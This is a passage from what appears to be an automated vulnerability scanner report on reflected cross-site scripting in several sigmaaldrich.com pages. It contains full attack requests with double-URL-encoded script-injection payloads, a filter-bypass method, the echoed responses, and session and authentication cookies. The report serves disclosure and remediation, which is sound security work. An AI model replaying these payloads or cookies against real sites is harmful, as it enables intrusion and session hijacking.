bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: stlwcmprd01.sial.com:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:08:03 GMT
Content-Length: 28939
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/analytical-chromatography27425";alert(1)//263fc626307/hplc.html","E404") ;
   </script>
...[SNIP]...

1.18. http://www.sigmaaldrich.com/analytical-chromatography/hplc.html [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /analytical-chromatography/hplc.html

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2a801%2522%253balert%25281%2529%252f%252f8a6f51f14da was submitted in the REST URL parameter 2. This input was echoed as 2a801";alert(1)//8a6f51f14da in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /analytical-chromatography/2a801%2522%253balert%25281%2529%252f%252f8a6f51f14da HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; 
bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: 141.247.173.160:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:08:04 GMT
Content-Length: 28930
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/analytical-chromatography/2a801";alert(1)//8a6f51f14da","E404") ;
   </script>
...[SNIP]...

1.19. http://www.sigmaaldrich.com/analytical-chromatography/labware-and-equipment.html [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /analytical-chromatography/labware-and-equipment.html

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 16eec%2522%253balert%25281%2529%252f%252f121212b1465 was submitted in the REST URL parameter 1. This input was echoed as 16eec";alert(1)//121212b1465 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /analytical-chromatography16eec%2522%253balert%25281%2529%252f%252f121212b1465/labware-and-equipment.html HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; 
bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: stlwcmprd01.sial.com:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:08:03 GMT
Content-Length: 28956
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/analytical-chromatography16eec";alert(1)//121212b1465/labware-and-equipment.html","E404") ;
   </script>
...[SNIP]...

1.20. http://www.sigmaaldrich.com/analytical-chromatography/labware-and-equipment.html [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /analytical-chromatography/labware-and-equipment.html

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 234a0%2522%253balert%25281%2529%252f%252f9de4501c6b6 was submitted in the REST URL parameter 2. This input was echoed as 234a0";alert(1)//9de4501c6b6 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /analytical-chromatography/234a0%2522%253balert%25281%2529%252f%252f9de4501c6b6 HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; 
bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: stlwcmprd01.sial.com:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:08:05 GMT
Content-Length: 28930
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/analytical-chromatography/234a0";alert(1)//9de4501c6b6","E404") ;
   </script>
...[SNIP]...

1.21. http://www.sigmaaldrich.com/analytical-chromatography/microbiology.html [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /analytical-chromatography/microbiology.html

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 58baf%2522%253balert%25281%2529%252f%252fa81e6945943 was submitted in the REST URL parameter 1. This input was echoed as 58baf";alert(1)//a81e6945943 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /analytical-chromatography58baf%2522%253balert%25281%2529%252f%252fa81e6945943/microbiology.html HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; 
bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: 141.247.173.160:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:08:05 GMT
Content-Length: 28947
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/analytical-chromatography58baf";alert(1)//a81e6945943/microbiology.html","E404") ;
   </script>
...[SNIP]...

1.22. http://www.sigmaaldrich.com/analytical-chromatography/microbiology.html [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /analytical-chromatography/microbiology.html

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9439c%2522%253balert%25281%2529%252f%252fd5a28f4e792 was submitted in the REST URL parameter 2. This input was echoed as 9439c";alert(1)//d5a28f4e792 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /analytical-chromatography/9439c%2522%253balert%25281%2529%252f%252fd5a28f4e792 HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; 
bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: stlwcmprd01.sial.com:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:08:07 GMT
Content-Length: 28930
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


